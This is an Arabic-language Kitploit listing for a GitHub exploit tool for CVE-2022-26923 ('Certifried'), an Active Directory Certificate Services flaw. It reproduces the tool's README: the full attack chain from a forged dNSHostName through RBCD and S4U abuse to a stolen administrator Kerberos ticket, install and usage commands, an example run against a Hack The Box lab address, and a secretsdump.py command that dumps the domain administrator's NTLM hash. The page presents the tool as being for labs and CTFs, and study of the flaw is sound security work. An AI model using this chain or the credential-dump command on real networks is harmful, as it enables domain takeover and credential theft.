Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-26923 — استغلال CVE-2022-26923 | Kitploit
أدوات/GitHubGitHub/eliasdekiniweek/cve-2022-26923
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةما بعد الاستغلالاختبار الاختراقالمصادقةالتعلم والتعليمالفريق الأحمر
GitHubeliasdekiniweek/cve-2022-26923

CVE-2022-26923

استغلال CVE-2022-26923

145منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2022-26923 – استغلال Certifried (إساءة استخدام AD CS)

أتمتة استغلال CVE-2022-26923 (Certifried) مما يسمح برفع الامتيازات عبر إساءة استخدام خدمات شهادات Active Directory (AD CS) وتفويض مقيد قائم على الموارد (RBCD)، مما يؤدي إلى تفريغ تجزئة NTLM لحساب مسؤول نطاق.

⚠️ للاستخدام التعليمي فقط / مختبر / HTB

لا تستخدم في بيئة غير مصرح بها.


🎯 الوصف

يقوم هذا السكريبت بأتمتة سلسلة الهجوم التالية:

  1. إنشاء حساب جهاز تحت السيطرة
  2. تعديل dNSHostName
  3. طلب شهادة عبر AD CS
  4. المصادقة بالشهادة
  5. إساءة استخدام RBCD
  6. S4U2Self + S4U2Proxy
  7. استخراج تذكرة Kerberos لحساب administrator
  8. تفريغ NTLM عبر secretsdump.py

🔗 الثغرة

  • CVE-2022-26923 – "Certifried"
  • تؤثر في بيئات Active Directory التي تستخدم AD CS
  • تسمح بانتحال هوية وحدة تحكم النطاق عبر شهادة صدرت بشكل غير صحيح

🛠 الأدوات المستخدمة

  • certipy-ad
  • bloodyAD
  • getST.py (Impacket)
  • secretsdump.py (Impacket)
  • openssl

📦 تثبيت التبعيات

root@kitploit:~
pipx install impacket
pipx install certipy-ad
pipx install bloodyad
sudo apt install openssl

🚀 الاستخدام

root@kitploit:~
chmod +x CVE-2022-26923.sh
./CVE-2022-26923.sh [خيارات]

الخيارات المتاحة

root@kitploit:~
-d, --dc-ip          عنوان IP لوحدة تحكم النطاق
-D, --domain         اسم النطاق
-u, --user           مستخدم صالح
-p, --pass           كلمة مرور المستخدم
-c, --comp-name      اسم الجهاز المسيطر عليه
-C, --comp-pass      كلمة مرور الجهاز
-a, --ca-name        اسم هيئة الشهادات
-t, --template       قالب الشهادة
-f, --pfx-file       اسم ملف PFX
-H, --dc-hostname    اسم مضيف وحدة تحكم النطاق
-A, --dc-account     حساب وحدة تحكم النطاق
-i, --impersonate    الحساب الهدف للانتحال
--verbose            وضع التصحيح
-h, --help           المساعدة

🧠 مثال (HTB Certified)

root@kitploit:~
./CVE-2022-26923.sh \
-d 10.129.1.39 \
-D certifried.htb \
-u [email protected] \
-p 'Ch4ng3m3!' \
--verbose

🔥 النتيجة المتوقعة

في نهاية التنفيذ:

  • تذكرة Kerberos administrator.ccache
  • تفريغ تجزئة NTLM لحساب administrator

في حالة وجود مشكلة مع Kerberos:

root@kitploit:~
KRB5CCNAME=/tmp/administrator.ccache secretsdump.py \
-just-dc-ntlm -just-dc-user administrator \
certifried.htb/[email protected] \
-k -no-pass -dc-ip 10.129.1.39

🧬 آلية العمل الداخلية

root@kitploit:~
إنشاء حساب جهاز
        ↓
تزوير dNSHostName
        ↓
طلب شهادة (قالب الجهاز)
        ↓
المصادقة عبر PFX
        ↓
إساءة استخدام RBCD (bloodyAD)
        ↓
S4U2Self + S4U2Proxy
        ↓
استخراج تذكرة Kerberos
        ↓
تفريغ NTLM عبر secretsdump

⚠️ إخلاء مسؤولية

تم تقديم هذا المشروع لأغراض:

  • تعليمية
  • بحث أمني
  • مختبر شخصي
  • CTF / HTB

يتخلى المؤلف عن أي مسؤولية في حالة الاستخدام غير المصرح به.


📜 الرخصة

MIT

تنزيل الأداة